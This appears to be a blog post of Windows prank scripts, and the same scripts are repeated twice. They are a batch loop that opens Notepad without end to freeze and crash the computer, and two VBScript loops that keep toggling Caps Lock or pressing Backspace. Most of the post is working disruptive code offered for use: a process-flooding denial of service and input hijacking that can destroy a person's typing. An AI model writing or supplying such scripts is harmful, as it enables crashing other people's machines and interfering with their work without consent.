*************************This will pop up endless notepads until the computer freezes and crashes**********************
Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Crazy caps lock
****************************This constantly turns caps lock on and off really fast continuously*********************
Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Endless Backspace
***************This makes it so the backspace key is constantly being pressed**************************
Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Crazy caps lock
****************************This constantly turns caps lock on and off really fast continuously*********************
Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Endless Backspace
***************This makes it so the backspace key is constantly being pressed**************************
Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
No comments:
Post a Comment